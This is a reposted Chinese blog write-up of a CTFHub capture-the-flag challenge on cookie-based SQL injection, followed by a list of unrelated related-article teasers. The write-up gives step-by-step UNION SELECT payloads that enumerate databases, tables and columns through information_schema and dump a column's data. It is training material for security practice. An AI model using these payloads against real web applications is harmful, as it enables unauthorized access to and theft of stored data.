CTFHUB-SQL注入-Cookie注入

CTFHUB-SQL注入-Cookie注入

news/2024/11/24 12:27:45/文章来源:https://blog.csdn.net/weixin_68416970/article/details/139442362

由于本关是cookie注入，就不浪费时间判断注入了，在该页面使用 burp工具抓包，修改cookie后面，加上SQL语句，关掉burp抓包，就可以在题目页面显示结果了

判断字段数量

发现字段数量是2列

使用id=-1 union select 1,2 判断回显

回显位置是第一二列

查询数据库名

union select 1,database()

查询所有数据库名

union select 1,group_concat(schema_name)from information_schema.schemata

查询数据库中的表名

union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

发现了2个表

查询表中字段名

union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='jhyppjlnjp'

查询字段下的数据

union select 1,group_concat(txpyjbpxlj) from sqli.jhyppjlnjp

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/348700.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

NewStarCTF_RE（week1，2）

NewStarCTF_RE（week1，2）

[NewStarCTF 2023 公开赛道]easy_RE ida 可能会把一个数组或字符串拆开，可以通过计算地址，知道是一起的也有的会藏在汇编窗口 Segments IDA的Segments窗口 ：shiftf7 https://www.cnblogs.com/sch01ar/p/9477697.html ida 各种窗口也是需要…

阅读更多...

Prometheus监控系统

Prometheus监控系统

目录一、Prometheus简介 1.Prometheus概念 ①Prometheus概念 ②监控通知流程 ③监控系统的数据产生流程 ④zabbix和prometheus 区别 ⑤TSDB 作为 Prometheus 的存储引擎完美契合了监控数据的应用场景 ２.Prometheus的基础组件 ①如何采集数据exporter组件 …

阅读更多...

PgSQL技术内幕 - psql与服务端连接与交互机制

PgSQL技术内幕 - psql与服务端连接与交互机制

PgSQL技术内幕 - 客户端psql与服务端连接与交互机制简单来说，PgSQL的psql客户端向服务端发起连接请求，服务端接收到请求后，fork出一个子进程，之后由该子进程和客户端进行交互，处理客户端的SQL等，并将结果返…

阅读更多...

Python第二语言（八、Python包）

Python第二语言（八、Python包）

目录 1. 什么是Python包 2. 创包步骤 2.1 new包 2.2 查看创建的包 2.3 拖动文件到包下 3. 导入包 4. 安装第三方包 4.1 什么是第三方包 4.2 安装第三方包-pip 4.3 pip网络优化 1. 什么是Python包包下有__init__.py就是包，无__init__.py就是文件夹。于Ja…

阅读更多...

Linux常用基本命令-操作

Linux常用基本命令-操作

目录一、shell 1、什么是shell 二、Linux基本的命令分类 1、内部命令和外部命令 2、查看内部命令 2.1、help命令 2.2、enable 命令 2.3、type命令 2.4、whereis命令 2.5、which 命令 2.6、hash缓存编辑三、Linux常用命令 1、Linux命令格式 2、编辑Linux命…

阅读更多...

FRP 内网穿透 | 实现远程访问与安全管理

FRP 内网穿透 | 实现远程访问与安全管理

唠唠闲话内网穿透简介在互联网上，两个不同主机进行通信需要知道对方的 IP 地址。由于世界人口和设备众多，IPv4 资源相对紧缺，因此绝大部分情况下是通过路由器或交换机转换公网 IP 后才上网。位于路由器或交换机后的设备通常是内网设备&…

阅读更多...

Chroium 源码目录结构分析（1）：源码目录体积一栏

Chroium 源码目录结构分析（1）：源码目录体积一栏

获取源码首先，我们拉一份最新的源代码（笔者是2024.6.6日拉取的）： fetch --nohistory chromium 源码预处理如果运行build，会生成许多生成的代码，因此我们不运行build。然后，把干扰后续分析…

阅读更多...

docker拉取镜像失败超时的解决方法,docker配置国内镜像源

docker拉取镜像失败超时的解决方法,docker配置国内镜像源

更换国内源创建或修改 /etc/docker/daemon.json 文件安装docker后一般只有 /etc/docker 这个目录下面并没有 daemon.json 文件我们直接创建 ： vim /etc/docker/daemon.json {"registry-mirrors" : ["https://registry.docker-cn.com"…

阅读更多...

【redis】redis事务

【redis】redis事务

目录 Redis事务四个命令redis事务特性redis事务执行原理 Redis 事务的使用基本使用watch 监控watch 实现原理补充 Redis事务 Redis事务是一种将多个命令打包成一个单独操作的机制，它保证了在执行这些命令期间，其他命令无法插入。四个命令 Redis事务通…

阅读更多...

基于Java+SpringBoot制作一个软考助手答题小程序

基于Java+SpringBoot制作一个软考助手答题小程序

基于Java+SpringBoot制作一个软考小助手考试答题小程序。其中系统前端功能包括注册登录、公告通知、考试答题、视频课程、考试记录、题库、题目评论、错题统计、我的收藏和用户信息管理模块；系统后台功能包括用户管理、题库管理、答题管理、学习视频管理以及系统管理模块。摘…

阅读更多...

VRRP基础配置（华为）

VRRP基础配置（华为）

#交换设备 VRRP基础配置 VRRP (Virtual Router Redundancy Protocol) 全称是虚拟路由规元余协议，它是一种容错协议。该协议通过把几台路由设备联合组成一台虚拟的路由设备，该虚拟路由器在本地局域网拥有唯一的一个虚拟 ID 和虚拟 IP 地址。实际上&…

阅读更多...

线程池前置知识

线程池前置知识

并发和并行并发是指在单核CPU上，多个线程占用不同的CPU时间片。线程在物理上还是串行执行的，但是由于每个线程占用的CPU时间片非常短（比如10ms），看起来就像是多个线程都在共同执行一样，这样的场景称作并发…

阅读更多...

Spring对事务的支持

Spring对事务的支持

一、事务事务防止进行操作时，数据库里面的数据丢失。二、Spring事务注解方式注解方式：在配置文件中配置事务管理器，利用注解，管理事务。实例银行转账：一个账户向另一个账户转账。 1）先在数据库my…

阅读更多...

UE4/UE5像素流送云推流|程序不稳定、弱网画面糊怎么办？

UE4/UE5像素流送云推流|程序不稳定、弱网画面糊怎么办？

看到不少反馈说像素流送技术在实际的应用中，存在一些问题，比如程序崩溃、画面模糊等。本文将探讨这些问题，并介绍点量云流软件提供了哪些有效的解决方案。常见的像素流送技术问题画面质量问题： 当快速操作UE模型或初次启动像素…

阅读更多...

LVS – NAT 模式集群构建

LVS – NAT 模式集群构建

目录 1 环境准备 1.1 准备四台服务器 1.2 IP与网关均按照下图配置 1.3 网卡配置 1.4 real server 安装 web服务 1.5 安装ipvsadm 管理工具 2 使用ipvsadm管理LVS 2.1 创建集群指定使用的算法 2.2 添加真实服务器指定工作原理 2.3 查看是否正确创建集群 2.4 开启FORWARD路由转发…

阅读更多...

专项测试——web测试

专项测试——web测试

1、web测试的总体策略 2、web测试的范围功能性能界面安全性兼容性DB文档 2.1 功能测试功能测试主要从链接、表单、cookie、设计语言、数据库、文件上传等方面进行。 2.1.1 链接 2.1.2 表单 2.1.3 cookie cookie是什么？ 服务器发送到用户浏览器并保存在用户本…

阅读更多...

$Lecture2——最优化问题建模$

Lecture2——最优化问题建模

一，建模 1，重要性实际上，我们并没有得到一个数学公式——通常问题是由某个领域的专家口头描述的。能够将问题转换成数学公式非常重要。建模并不是一件容易的事：有时，我们不仅想找到一个公式，还想找到一个…

阅读更多...

Windows搭建nacos集群

Windows搭建nacos集群

Nacos是阿里巴巴的产品，现在是SpringCloud中的一个组件。相比Eureka功能更加丰富，在国内受欢迎程度较高。下载地址：Tags alibaba/nacos GitHub 链接：百度网盘请输入提取码提取码：8888 解压文件夹目录说明&am…

阅读更多...

Vue3中的常见组件通信之`$refs`、`$parent`

Vue3中的常见组件通信之`$refs`、`$parent`

Vue3中的常见组件通信之$refs、$parent 概述在vue3中常见的组件通信有props、mitt、v-model、 r e f s 、 refs、 refs、parent、provide、inject、pinia、slot等。不同的组件关系用不同的传递方式。常见的撘配形式如下表所示。组件关系传递方式父传子1. props2. v-mod…

阅读更多...

webp2jpg网页在线图片格式转换源码

webp2jpg网页在线图片格式转换源码

源码介绍 webp2jpg-免费在线图片格式转化器, 可将jpeg、jpg、png、gif、 webp、svg、ico、bmp文件转化为jpeg、png、webp、webp动画、gif文件。无需上传文件，本地即可完成转换! 源码特点： 无需上传，使用浏览器自身进行转换批量转换输出we…

阅读更多...

最新文章

推荐文章